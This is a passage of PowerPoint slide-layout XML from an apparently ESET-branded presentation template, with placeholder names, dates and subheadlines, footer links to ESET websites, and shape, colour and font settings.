              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5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BFEE68BE-8E83-52C2-4119-2D950F65738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357364" y="7614376"/>
            <a:ext cx="7330440" cy="9239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ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2000" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2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ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr">
              <a:buFontTx/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5F59BD-AD6C-7EF3-F713-4EC2BF8D14AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994017" y="8619126"/>
            <a:ext cx="12299970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1828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1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>www.eset.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>www.welivesecurity.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> @ESETresearch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1374572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91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82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93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4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95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 advAuto="0"/>
      <p:bldP spid="17" grpId="0"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="21" grpId="0" build="p"/>
      <p:bldP spid="22" grpId="0" build="p"/>
      <p:bldP spid="23" grpId="0" build="p" advAuto="0"/>
    </p:bldLst>
  </p:timing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1536484"/>
            <a:ext cx="10724573" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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r>
              <a:rPr lang="en-US"/>
              <a:t>ESET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6300" y="5255997"/>
            <a:ext cx="10724573" cy="1450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500">
                <a:solidFill>
                  <a:schemeClr val="bg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err="1"/>
              <a:t>Subheadline</a:t>
            </a:r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B20EF9-3D25-52F4-8567-10AF721D02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7053977"/>
            <a:ext cx="3586162" cy="51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2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F0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14061"/>
            <a:ext cx="3586162" cy="5159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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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50FB943-52AF-0572-835A-1257A716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895202"/>
            <a:ext cx="3586162" cy="412806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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023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AE688B1-A6C6-753F-3E25-66F59C2E72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72000" y="8784000"/>
            <a:ext cx="4147826" cy="720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55431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28140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28140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318052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318052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2BC72547-8891-B182-CD10-DF74AAEE8FD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28140" y="3940638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06C9AC9-EA73-2C76-6F33-7D8C21BA6E3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3096" y="3908243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119E133-4D50-B36E-1BCB-93AC1E9DD58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18052" y="3908243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A5A4B7-296D-DB16-E8E3-D2C27A5FF0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="3908243"/>
            <a:ext cx="0" cy="3477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EF29002-1EF9-3A87-5666-EDB308948BE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11813177" y="3908243"/>
            <a:ext cx="0" cy="3477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646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Tech De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E44C4C9-9231-1BF5-FF07-A477E9A0D3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1" y="1536484"/>
            <a:ext cx="10724574" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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r>
              <a:rPr lang="en-US"/>
              <a:t>ESET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6301" y="5255998"/>
            <a:ext cx="10724574" cy="1450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500">
                <a:solidFill>
                  <a:schemeClr val="bg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err="1"/>
              <a:t>Subheadline</a:t>
            </a:r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B20EF9-3D25-52F4-8567-10AF721D02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1" y="7053979"/>
            <a:ext cx="3586162" cy="51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2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F0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1" y="7614063"/>
            <a:ext cx="3586162" cy="5159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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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50FB943-52AF-0572-835A-1257A716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301" y="895203"/>
            <a:ext cx="3586162" cy="412806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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023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4F2A0DC-8F63-789C-C548-DA515F5720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645301" y="8787742"/>
            <a:ext cx="3766402" cy="622960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="508000">
              <a:schemeClr val="tx2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="241300" dist="38100" dir="5400000" sx="85000" sy="85000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39419971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Custom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3" y="1536486"/>
            <a:ext cx="10724574" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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r>
              <a:rPr lang="en-US"/>
              <a:t>ESET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6303" y="5255999"/>
            <a:ext cx="10724574" cy="145032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500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685836" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="3000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371670" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2700"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057504" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743338" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3429172" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="4115006" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4800840" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="5486676" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Subheadline</a:t>
            </a:r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B20EF9-3D25-52F4-8567-10AF721D02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2" y="7053978"/>
            <a:ext cx="3586164" cy="5159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2502" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342918" lvl="0" indent="-342918"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F0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2" y="7614062"/>
            <a:ext cx="3586164" cy="51594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602" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342918" lvl="0" indent="-342918"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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50FB943-52AF-0572-835A-1257A716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302" y="895203"/>
            <a:ext cx="3586164" cy="412806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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1602" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1002" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1002" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1002" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1002" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342918" lvl="0" indent="-342918"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2908334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Number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28140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28140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318052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318052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2BC72547-8891-B182-CD10-DF74AAEE8FD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28140" y="3940638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06C9AC9-EA73-2C76-6F33-7D8C21BA6E3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3096" y="3908243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119E133-4D50-B36E-1BCB-93AC1E9DD58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18052" y="3908243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A5A4B7-296D-DB16-E8E3-D2C27A5FF0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="3908243"/>
            <a:ext cx="0" cy="3477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EF29002-1EF9-3A87-5666-EDB308948BE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11813177" y="3908243"/>
            <a:ext cx="0" cy="3477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426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2A863C4-EE50-C944-62F5-23F9B7DF4C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95D6E87-A13D-F566-D62D-EB57A53FFE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4D65F5C-279D-1C32-AB79-DE7A980F5F2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C24A49B-8A2A-01E4-1C90-B689E2623C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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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620309B-D431-8C59-4EBC-F88AAD774DB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55568-8BF1-6077-6CC0-55CE0032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FB6107C-8944-6226-343E-58A4E49986B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6300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FEBDB03B-7229-2BC8-9100-D3EC5C23DE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10376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D438C226-A5A0-BEB6-A3EE-FEC5D523476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44452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0C43DD11-D6E6-A526-3F9F-BA9B5F0DC88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878528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8A0233-F797-0688-A4AD-365143E0F385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13485223" y="3908243"/>
            <a:ext cx="0" cy="3266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0146B92-17E5-9A17-C055-C5C529BB64FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="3938066"/>
            <a:ext cx="0" cy="3266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ADACD37-F229-962F-6E3D-5B3D52EAD80B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4811486" y="3908243"/>
            <a:ext cx="0" cy="3266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5855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Number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2A863C4-EE50-C944-62F5-23F9B7DF4C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95D6E87-A13D-F566-D62D-EB57A53FFE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4D65F5C-279D-1C32-AB79-DE7A980F5F2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C24A49B-8A2A-01E4-1C90-B689E2623C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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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620309B-D431-8C59-4EBC-F88AAD774DB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55568-8BF1-6077-6CC0-55CE0032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FB6107C-8944-6226-343E-58A4E49986B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6300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FEBDB03B-7229-2BC8-9100-D3EC5C23DE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10376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D438C226-A5A0-BEB6-A3EE-FEC5D523476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44452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0C43DD11-D6E6-A526-3F9F-BA9B5F0DC88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878528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8A0233-F797-0688-A4AD-365143E0F385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13485223" y="3908243"/>
            <a:ext cx="0" cy="3266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0146B92-17E5-9A17-C055-C5C529BB64FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="3938066"/>
            <a:ext cx="0" cy="3266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ADACD37-F229-962F-6E3D-5B3D52EAD80B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4811486" y="3908243"/>
            <a:ext cx="0" cy="3266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2606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Numbers turq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96060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96060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16802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16802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2BC72547-8891-B182-CD10-DF74AAEE8FD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96060" y="3940638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06C9AC9-EA73-2C76-6F33-7D8C21BA6E3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3096" y="3908243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119E133-4D50-B36E-1BCB-93AC1E9DD58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516802" y="3908243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B6DA327-6F6C-168B-8A3A-BDB41D164630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="3908243"/>
            <a:ext cx="0" cy="347778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107358-D34E-AF22-15BA-D83EDBDA21FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11908971" y="3908243"/>
            <a:ext cx="0" cy="347778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6970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Numbers turq">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="0096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1129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2A863C4-EE50-C944-62F5-23F9B7DF4C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95D6E87-A13D-F566-D62D-EB57A53FFE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681129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4D65F5C-279D-1C32-AB79-DE7A980F5F2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C24A49B-8A2A-01E4-1C90-B689E2623C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681129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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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620309B-D431-8C59-4EBC-F88AAD774DB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681129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55568-8BF1-6077-6CC0-55CE0032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FB6107C-8944-6226-343E-58A4E49986B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6300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FEBDB03B-7229-2BC8-9100-D3EC5C23DE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10376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D438C226-A5A0-BEB6-A3EE-FEC5D523476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44452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0C43DD11-D6E6-A526-3F9F-BA9B5F0DC88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878528" y="3940638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/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="9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35009D-A400-30FD-A172-71507A991E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13485223" y="3908243"/>
            <a:ext cx="0" cy="326678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4FE7FE-EF3E-851E-E521-CF73CC52F12B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="3938066"/>
            <a:ext cx="0" cy="326678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7847671-8A3E-6DB4-7EB8-EA9E0A46295B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4811486" y="3908243"/>
            <a:ext cx="0" cy="326678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880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Images Squa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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89F496AB-79AC-606A-F043-2B1DBD6F92D8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/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Freeform: Shape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23333665-BEF4-C268-A78E-B9D1A760458F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="14579424" y="7001300"/>
            <a:ext cx="3708576" cy="32856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/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20059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20059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226133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226133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55FF0BB-FEF2-7845-AEA2-C7C67F472F8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350296" y="3055101"/>
            <a:ext cx="3014663" cy="30146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B4AA2CD4-91AE-15D4-5047-D058C7A5156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636668" y="3055101"/>
            <a:ext cx="3014663" cy="30146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F977CC7-D310-08FD-4968-35876E337A0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856368" y="3055101"/>
            <a:ext cx="3014663" cy="30146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808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Images Squa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7FBCF3B-DC0C-B94A-05F4-DC0C79A28B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BCAD57E3-99FC-CFD5-1427-ECE47B34C9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CD1C6C9-FB60-50E2-3612-8009F9D9D34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2B5D4F1-2B80-DE54-1383-35773E0A8C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E45A7BF-3955-CB0D-9514-92CB5A39CA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2C696C4-3914-DF71-3EF4-CFFA37D99B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C4BE47FF-1E04-6D4F-5226-5B0065C0E54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C9D0B029-760D-7768-CBEB-1658F1C2F5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134AB4B-C19B-E6ED-508C-F93E79643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5B2879CF-7A50-EF39-8CB5-0DC37D20B80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72584" y="3192131"/>
            <a:ext cx="2740603" cy="2740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F6B8451A-C2D0-7BFF-0656-5531C8934D7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06660" y="3192131"/>
            <a:ext cx="2740603" cy="2740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E864AAAB-1F13-C6B3-F547-AA2E975B2C2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40736" y="3194671"/>
            <a:ext cx="2740603" cy="2740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84E51C0D-9943-3431-31D3-EC624450C4F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4274812" y="3192131"/>
            <a:ext cx="2740603" cy="2740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049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Images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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C982FBE3-24DA-EF3E-4046-AB99AEFFA9BC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Freeform: Shape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D139A6F-BFBB-DCEF-9172-43CCEC62AA89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="14579424" y="7001300"/>
            <a:ext cx="3708576" cy="32856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20059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20059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226133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226133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55FF0BB-FEF2-7845-AEA2-C7C67F472F8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350296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B4AA2CD4-91AE-15D4-5047-D058C7A5156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636668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F977CC7-D310-08FD-4968-35876E337A0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856368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928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Images Circle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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C982FBE3-24DA-EF3E-4046-AB99AEFFA9BC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Freeform: Shape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D139A6F-BFBB-DCEF-9172-43CCEC62AA89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="14579424" y="7001300"/>
            <a:ext cx="3708576" cy="32856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20059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20059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226133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226133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55FF0BB-FEF2-7845-AEA2-C7C67F472F8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350296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B4AA2CD4-91AE-15D4-5047-D058C7A5156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636668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F977CC7-D310-08FD-4968-35876E337A0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856368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61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Tech De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1536484"/>
            <a:ext cx="10724573" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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r>
              <a:rPr lang="en-US"/>
              <a:t>ESET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6300" y="5255997"/>
            <a:ext cx="10724573" cy="1450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500">
                <a:solidFill>
                  <a:schemeClr val="bg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err="1"/>
              <a:t>Subheadline</a:t>
            </a:r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B20EF9-3D25-52F4-8567-10AF721D02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7053977"/>
            <a:ext cx="3586162" cy="51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2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F0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14061"/>
            <a:ext cx="3586162" cy="5159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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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50FB943-52AF-0572-835A-1257A716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895202"/>
            <a:ext cx="3586162" cy="412806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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
